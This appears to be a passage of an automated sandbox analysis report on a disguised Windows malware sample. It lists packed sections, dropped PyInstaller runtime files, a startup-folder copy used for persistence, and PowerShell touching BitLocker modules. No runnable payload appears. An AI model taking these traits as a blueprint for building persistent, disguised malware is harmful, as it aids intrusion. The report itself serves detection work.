Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A809763E push rbp; retf 2_2_00007FF8A8097657
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095E67 push rdi; iretd 2_2_00007FF8A8095E69
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8097F67 push rbp; iretq 2_2_00007FF8A8097F68
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8096859 push rsi; ret 2_2_00007FF8A8096890
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8097689 push r12; ret 2_2_00007FF8A80976CD
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A809808B push r12; iretd 2_2_00007FF8A809809F
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095F7B push r8; ret 2_2_00007FF8A8095F83
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095EB4 push rsp; iretd 2_2_00007FF8A8095EB5
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095FB9 push r10; ret 2_2_00007FF8A8095FCC
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8098DBF push rsp; retf 2_2_00007FF8A8098DC0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095DF7 push r10; retf 2_2_00007FF8A8095DFA
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095CED push rdx; ret 2_2_00007FF8A8095CF7
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095CE0 push r10; retf 2_2_00007FF8A8095CE2
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A8095CE5 push r8; ret 2_2_00007FF8A8095CEB
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A80982D8 push rdi; iretd 2_2_00007FF8A80982DA
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 2_2_00007FF8A872161E push rdx; iretd 2_2_00007FF8A8721621
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF84769D2A5 pushad ; iretd 7_2_00007FF84769D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF8477B00BD pushad ; iretd 7_2_00007FF8477B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF8477B83FC push ebx; ret 7_2_00007FF8477B847A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF8477B85FD push ebx; ret 7_2_00007FF8477B860A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF8477B860B push ebx; ret 7_2_00007FF8477B860A
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\libcrypto-3.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\libssl-3.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\select.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\libffi-8.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\_ssl.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\Users\user\AppData\Local\Temp\_MEI17882\python312.dll Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: initial sample Static PE information: #U202f#U202f#U2005#U00a0.scr.exe
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE151E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00007FF73AE151E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
